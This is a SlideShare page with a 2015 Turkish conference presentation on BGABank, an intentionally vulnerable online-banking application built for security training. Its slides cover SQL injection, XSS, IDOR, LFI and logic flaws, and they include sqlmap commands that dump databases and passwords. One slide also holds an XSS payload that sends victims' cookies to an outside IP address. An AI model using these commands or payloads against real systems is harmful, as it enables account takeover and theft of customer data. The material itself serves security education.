Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.

8 Ocak 2015 SOME Etkinligi - BGA Bank Vulnerable Web Application

8 Ocak 2015 tarihinde gerçekleştirilen Kurumsal SOME Yönetimi Ve Proaktif Güvenlik Çözümleri Etkinliği'ne ait sunumlardır.

Ähnliche Bücher

Kostenlos mit einer 30-tägigen Testversion von Scribd

Alle anzeigen

Ähnliche Hörbücher

Kostenlos mit einer 30-tägigen Testversion von Scribd

Alle anzeigen
  • Als Erste(r) kommentieren

8 Ocak 2015 SOME Etkinligi - BGA Bank Vulnerable Web Application

  1. 1. ì   BGABANK  -­‐  Vulnerable  Web  App   Huzeyfe  ÖNAL    &    Celal  ERDIK   Huzeyfe  ÖNAL:   Kurumsal  Web:   h<p://www.bga.com.tr     Kişisel  Blog:   h<p://www.lifeoverip.net     İleKşim:   huzeyfe.onal@bga.com.tr   Huzeyfe.onal@gmail.com     Celal  Erdik:     Kurumsal  Web:   h<p://www.bga.com.tr     Kişisel  Blog:   h<p://www.networkpentest.net     İleKşim:   celal.erdik@bga.com.tr   fc.erdik@gmail.com    
  2. 2. BgaBank  Hakkında   ì  Vulnerable  Banka  İnternet  Şubesi  Uygulaması   ì  IPS,WAF  ve  Güvenlik  duvarsız  erişim  kullanım  imkanı    -­‐  WaZest.bgabank.com    -­‐  Ipstest.bgabank.com    -­‐  www.bgabank.com   ì  50+  teknik  ve  man^ksal  web  uygulama  açıklığı   ì  Linux  sistem  üzerinde  hosKng.  
  3. 3. Sık  Görülen  Açıklıklar   ì  Cross  site  scripKng     ì  Sql  İnjecKon     ì  Session  management  /  Login  Bypass   ì  IDOR  –  Insecure  direct  object  referance   ì  CSRF   ì  Man^ksal  açıklıklar(Başka  hesaptan  havale,  kur  değişimi  vs.)  
  4. 4. SQL  Injection  Nedir?   ì  Girdi  kontrolünün  sağlıklı  yapılmamasından  kaynaklanır.   ì  Mevcut  SQL  cümleciğininin  değişKrilmesine  imkan  sağlar   ì  SQL  InjecKon;   ì  Saldırganlar  için  en  popüler,     ì  GelişKriciler  için  en  bilindik,     ì  İş  sahipleri  için  en  tehlikeli    açıklık^r.   ì  Hedef  veritabanında  uygulama  yolu  ile  yetkisiz  olarak    sql   sorgularının  çalış^rılabilmesidir.  
  5. 5. Sql  Injection  –  Sık  görülen  çeşitleri   ì  Sık  Görülen  SQL  InjecKon  türleri;   ì  Error  based  (Hata  mesajları  ile  ilerleme)   ì  Blind  (Man^ksal  ifadeler  )   ì  Boolean  based  (MatemaKksel  ifadeler)   ì  Time  based  (waimor  delay,  sleep  fonk.  Zaman  tabanlı  sorgular)   ì  Stack  based  (Kendi  sql  sorgunuzu  insert)  
  6. 6. Sql  İnjection  –  Neler  yapılabilir   ì  Veritabanı  üzerinde  tam  hakimiyet;   ì  İnsert   ì  Update   ì  Delete   ì  Hedef  işleKm  sistemi  ele  geçirme   ì  Mssql  –  xp_cmdshell   ì  Mysql  –  Webshell,  phpmyadmin   ì  Meterpreter  oturumu  ile  işleKm  sistemi  üzerinde  tam  kontrol  
  7. 7. Sql  Injection  –  Manuel  tespit   ì  Error  based  sql  injecKon  manuel  test   ì  h<p://isube.bgabank.com/index.php? sayfa=arama.php&s1=test"&s2=  
  8. 8. Sql  Injection  –  Exploit  etme   ì  ./sqlmap.py  -­‐u  "h<p://isube.bgabank.com/index.php? sayfa=arama.php&s1=test&s2="  -­‐p  s1  -­‐-­‐dbms=mysql  -­‐-­‐ technique  E  -­‐-­‐risk  3  -­‐-­‐level  3  -­‐-­‐flush-­‐session  -­‐-­‐dbs  
  9. 9. Sql  İnjection  –  root  parolası  alma   ì  ./sqlmap.py  -­‐u  "h<p://isube.bgabank.com/index.php? sayfa=arama.php&s1=test&s2="  -­‐p  s1  -­‐-­‐dbms=mysql  -­‐-­‐ technique  E  -­‐-­‐risk  3  -­‐-­‐level  3  -­‐-­‐dbs  -­‐-­‐current-­‐user  –passwords  
  10. 10. Sql  İnjection  –  İşletim  Sistemi  ele  geçirme   ì  Wfuzz,dirb  ile  phpmyadmin  arabirimi  bulunabilir.  
  11. 11. Sql  İnjection  –  Webshell  komut  çalıştırma  
  12. 12. Sql  İnjection  –  Login  Formu  Atlatma  
  13. 13. XSS(Cross  Site  Scripting)  Nedir?   ì  Girdinin  üzerinde  bir  kontrol  yapılmadan  aynı  veya  başka  bir   kullanıcıya  yansı^lması   ì  Html/dhtml/css  veya  javascript  kodunun  izinsiz  olarak  kurbanın   tarayıcısında  çalış^rılmasıdır.   ì  Üç  genel  XSS  çeşidi  mevcu<ur;   ì  Reflected   ì  Stored   ì  DOM  Based  
  14. 14. Reflected  XSS  –  Oturum  elde  etme   ì  Url:  isube.bgabank.com/index.php?sayfa=arama.php&s1=&s2=   ì  Payload:  "><Script>document.locaKon='h<p://85.95.238.172/ test.php?cookie='+document.cookie;<Script>   ì  Apache  access  loglarından  kullanıcı  cookie  bilgisi  alınabilir.  
  15. 15. Reflected  XSS  –  Oturum  elde  etme   ì  Cookie  manager  ile  elde  edilen  cookie  sisteme  eklenerek   kullanıcı  oturumu  alınabilir.  
  16. 16. Stored  Xss  –  MT  Oturumu  alma   ì  Müşteri  temsilcisine  mesaj  gönderirken  olması  durumunda  (!)  
  17. 17. Stored  XSS  –  MT  Oturumu  alma  
  18. 18. User  Agent  -­‐  Kısıtlamaları  Atlatma   ì  Havale/EFT  işlemlerinde  mobil  uygulamalardan  yapılması   durumunda  havale/eZ  ücreK  alınmama  hizmeK  suisKmal   edilebilir.   ì  User  agent  mobil  olarak  değişKrilip  bu  vb.  kısıtlamalar   geçilebilir.   ì  Yine  aynı  şekilde  mobil  uygulamalarda  login  formunda  captcha   çıkmaması  durumunda  mobil  bir  user  agent  ile  sistemde  kaba   kuvvet  saldırıları  gerçekleşKrilebilir.  
  19. 19. X-­‐Forwarde-­‐For  IP  Restriction  Atlatma   ì  X-­‐forwarded-­‐for  başlık  bilgisine  göre  kontrol  edilmişse  atlatmak   mümkündür.  
  20. 20. IDOR  –  Insecure  Direct  Object  Ref.   ì  h<p://isube.bgabank.com/profil.aspx?musteriID=56   bağlan^sı  üzerinde  musteriID  parametresindeki  değer  değişKrilerek   diğer  müşterilere  ait  bilgiler  elde  edilebilmektedir.  
  21. 21. Dizin  Dolaşma/LFI  –  Local  File  Inclusion   ì  Local  dosyayı  kaynak  koda  dahil  ederek  içeriğinin   görüntülenmesi,  dizin  dolaşarak  local  dosya  bulma.  
  22. 22. Mantıksal  Açıklık–  Döviz  kuru  değiştirme  
  23. 23. Mantıksal  Açıklık  –  Döviz  kuru  değiştirme    
  24. 24. HPP  –  Http  Parameter  Pollution   ì  Bir  parametrenin  birden  çok  kez  kullanımı,  veya  farklı   parametre  datalarının  birleşKrilmesi  
  25. 25. Dinlediğiniz  İçin  Teşekkürler  

×